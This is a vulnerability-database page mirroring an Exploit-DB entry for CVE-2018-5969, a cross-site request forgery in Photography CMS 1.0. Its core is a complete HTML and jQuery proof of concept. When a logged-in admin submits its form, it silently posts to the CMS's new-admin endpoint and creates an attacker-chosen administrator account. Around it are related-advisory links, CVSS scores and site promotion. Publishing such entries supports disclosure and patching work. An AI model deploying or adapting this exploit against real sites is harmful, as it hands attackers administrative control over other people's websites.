Lucene search
K

Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)

🗓️ 23 Jan 2018 00:00:00Reported by Ihsan SencanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Photography CMS 1.0 Cross-Site Request Forgery vulnerability to add admi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin) Vulnerability
24 Jan 201800:00
zdt
CNVD
Photography CMS Cross-Site Request Forgery Vulnerability
25 Jan 201800:00
cnvd
CVE
CVE-2018-5969
24 Jan 201810:00
cve
Cvelist
CVE-2018-5969
24 Jan 201810:00
cvelist
EUVD
EUVD-2018-17734
7 Oct 202500:30
euvd
exploitpack
Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
23 Jan 201800:00
exploitpack
NVD
CVE-2018-5969
24 Jan 201810:29
nvd
Packet Storm
Photography CMS 1.0 Cross Site Request Forgery
24 Jan 201800:00
packetstorm
Prion
Cross site request forgery (csrf)
24 Jan 201810:29
prion
<!--
# # # # # 
# Exploit Title: Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: http://ronnieswietek.com/
# Software Link: https://codecanyon.net/item/client-photo-studio-photography-cms/1191688
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5969
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# 
# Proof of Concept:
# 1)
-->
<html>
<body>
<script src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
<h2>New Admin</h2>
<div class="efe">
<form method="post" onSubmit="return false">
	<label for="username">Username:</label>
	<input id="username" type="text"><br><br>

	<label for="password1">Password:</label>
	<input id="password1" type="password"><br><br>

	<label for="password2">Confirm Password:</label>
	<input id="password2" type="password"><br><br>

	<label for="email">Email:</label>
	<input id="email" type="text"><br><br>

	<input id="ekleabi" value="Ver Ayari" type="submit">
</form>
</div>
<script type="text/javascript">
	$("#ekleabi").live('click',function()
	{
		$.ajax({
			type: "POST",
			url: "http://ronnieswietek.com/cc/clients/resources/ajax/ajax_new_admin.php",
			data:{
				username:$(".efe #username").val(),
				password1:$(".efe #password1").val(),
				password2:$(".efe #password2").val(),
				email:$(".efe #email").val()
			}
		});
	});
</script>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jan 2018 00:00Current
9High risk
Vulners AI Score9
CVSS 26.8
CVSS 38.8
EPSS0.00256
31